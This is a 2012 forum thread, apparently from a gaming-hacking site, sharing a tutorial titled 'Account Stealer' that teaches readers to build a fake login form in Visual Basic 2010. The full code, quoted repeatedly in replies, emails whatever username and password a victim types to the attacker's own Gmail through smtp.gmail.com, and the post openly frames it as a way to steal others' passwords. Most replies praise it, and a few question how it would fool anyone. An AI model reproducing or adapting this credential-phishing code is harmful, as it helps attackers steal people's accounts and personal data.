Post: Account Stealer, usefull for all kind of sites! [Visual Basic 2010]
09-23-2012, 09:06 AM #1
FrenziosMix
Who’s Jim Erased?
(adsbygoogle = window.adsbygoogle || []).push({}); there are loads of tutorials on google, i am not the creator.. , i just wanted to share this with you guys,
In this tutorial you will learn how to Steal/Hack someone's password with Visual Basic 2010
This is just a simple example, you could design your program with images and more..

To do this you will need the following things
- a Gmail account
- Visual Basic

Difficulty - Easy

Let's get started..

First you'll need to create a new project name it "PasswordStealer"
You must login or register to view this content.[/CENTER]

When you have done that add:

-2 labels
-2 textboxes
-1 button

Try to make it look like a normal login form like this;
You must login or register to view this content.

Congratulations, you've finished your layout..

Now we need to make the button send the Username&Password to out mail Winky Winky , Double click on your Button and paste the following code

    
If Textbox1.Text = "" Then
MsgBox("Account Name Fehlt")
If Textbox2.Text = "" Then
MsgBox("Passwort Fehlt")
Else
End If
End If
Dim smtpServer As New SmtpClient
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Email", "Your password")
'using gmail
smtpServer.port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your email")
mail.To.Add("Your email")
mail.Subject = "Username: & Textbox1.Text"
mail.Body = "Username : " & Textbox1.Text & ", " & "Password : " & Textbox2.Text
smtpServer.Send(mail)
MsgBox("Congratulations, You have succesfully created a password stealer.. Login into your mail, and see the username and password Smile")




You must login or register to view this content.

if i helped you please hit that thanks button Smile
Thanks,

~Roah
(adsbygoogle = window.adsbygoogle || []).push({});

The following 2 users say thank you to FrenziosMix for this useful post:

BIG_RED_BUTTON, GRUEL
10-28-2012, 02:09 PM #11
Originally posted by roah View Post
there are loads of tutorials on google, i am not the creator.. , i just wanted to share this with you guys,
In this tutorial you will learn how to Steal/Hack someone's password with Visual Basic 2010
This is just a simple example, you could design your program with images and more..

To do this you will need the following things
- a Gmail account
- Visual Basic

Difficulty - Easy

Let's get started..

First you'll need to create a new project name it "PasswordStealer"
You must login or register to view this content.[/CENTER]

When you have done that add:

-2 labels
-2 textboxes
-1 button

Try to make it look like a normal login form like this;
You must login or register to view this content.

Congratulations, you've finished your layout..

Now we need to make the button send the Username&Password to out mail Winky Winky , Double click on your Button and paste the following code

    
If Textbox1.Text = "" Then
MsgBox("Account Name Fehlt")
If Textbox2.Text = "" Then
MsgBox("Passwort Fehlt")
Else
End If
End If
Dim smtpServer As New SmtpClient
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Email", "Your password")
'using gmail
smtpServer.port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your email")
mail.To.Add("Your email")
mail.Subject = "Username: & Textbox1.Text"
mail.Body = "Username : " & Textbox1.Text & ", " & "Password : " & Textbox2.Text
smtpServer.Send(mail)
MsgBox("Congratulations, You have succesfully created a password stealer.. Login into your mail, and see the username and password Smile")




You must login or register to view this content.

if i helped you please hit that thanks button Smile
Thanks,

~Roah


hey btw look at this program in a hex editor you can clearly see the email redirection and that its taking your info and this isnt a very good account stealer if this actually logged them in it would be a 100 times more convincing
10-28-2012, 03:11 PM #12
Herbal_T_Bag
You talkin to me?
nice tutorial.
10-28-2012, 06:03 PM #13
noobtube2
Bounty hunter
Looks kinda useful
11-01-2012, 09:17 PM #14
FrenziosMix
Who’s Jim Erased?
Originally posted by Bag View Post
nice tutorial.


thankyou =)
11-01-2012, 09:20 PM #15
imoderatur-
Do a barrel roll!
This is pretty coolUpside Down Happy
11-01-2012, 09:25 PM #16
UPTOWN
Treasure hunter
#CutItOut Norton is Safe!!..
11-03-2012, 06:40 AM #17
couldnt get this to work coding erors apparently
11-06-2012, 10:32 PM #18
x420XP
Utter Perfectionist
Originally posted by roah View Post
there are loads of tutorials on google, i am not the creator.. , i just wanted to share this with you guys,
In this tutorial you will learn how to Steal/Hack someone's password with Visual Basic 2010
This is just a simple example, you could design your program with images and more..

To do this you will need the following things
- a Gmail account
- Visual Basic

Difficulty - Easy

Let's get started..

First you'll need to create a new project name it "PasswordStealer"
You must login or register to view this content.[/CENTER]

When you have done that add:

-2 labels
-2 textboxes
-1 button

Try to make it look like a normal login form like this;
You must login or register to view this content.

Congratulations, you've finished your layout..

Now we need to make the button send the Username&Password to out mail Winky Winky , Double click on your Button and paste the following code

    
If Textbox1.Text = "" Then
MsgBox("Account Name Fehlt")
If Textbox2.Text = "" Then
MsgBox("Passwort Fehlt")
Else
End If
End If
Dim smtpServer As New SmtpClient
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Email", "Your password")
'using gmail
smtpServer.port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your email")
mail.To.Add("Your email")
mail.Subject = "Username: & Textbox1.Text"
mail.Body = "Username : " & Textbox1.Text & ", " & "Password : " & Textbox2.Text
smtpServer.Send(mail)
MsgBox("Congratulations, You have succesfully created a password stealer.. Login into your mail, and see the username and password Smile")




You must login or register to view this content.

if i helped you please hit that thanks button Smile
Thanks,

~Roah


Nice, but you're just getting people (skids) to copy code, you should be teaching people instead. Disappointed.
11-11-2012, 09:59 AM #19
Originally posted by roah View Post
there are loads of tutorials on google, i am not the creator.. , i just wanted to share this with you guys,
In this tutorial you will learn how to Steal/Hack someone's password with Visual Basic 2010
This is just a simple example, you could design your program with images and more..

To do this you will need the following things
- a Gmail account
- Visual Basic

Difficulty - Easy

Let's get started..

First you'll need to create a new project name it "PasswordStealer"
You must login or register to view this content.[/CENTER]

When you have done that add:

-2 labels
-2 textboxes
-1 button

Try to make it look like a normal login form like this;
You must login or register to view this content.

Congratulations, you've finished your layout..

Now we need to make the button send the Username&Password to out mail Winky Winky , Double click on your Button and paste the following code

    
If Textbox1.Text = "" Then
MsgBox("Account Name Fehlt")
If Textbox2.Text = "" Then
MsgBox("Passwort Fehlt")
Else
End If
End If
Dim smtpServer As New SmtpClient
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Email", "Your password")
'using gmail
smtpServer.port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your email")
mail.To.Add("Your email")
mail.Subject = "Username: & Textbox1.Text"
mail.Body = "Username : " & Textbox1.Text & ", " & "Password : " & Textbox2.Text
smtpServer.Send(mail)
MsgBox("Congratulations, You have succesfully created a password stealer.. Login into your mail, and see the username and password Smile")




You must login or register to view this content.

if i helped you please hit that thanks button Smile
Thanks,

~Roah


why would people download something you sent them that says that ? & why would they have a username and password for nothing ?? its not a website or that? you would have to put it onto a website or something & at that you wouldn't get anyones emails and passwords plz explain what you do with this to steal peoples details !

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo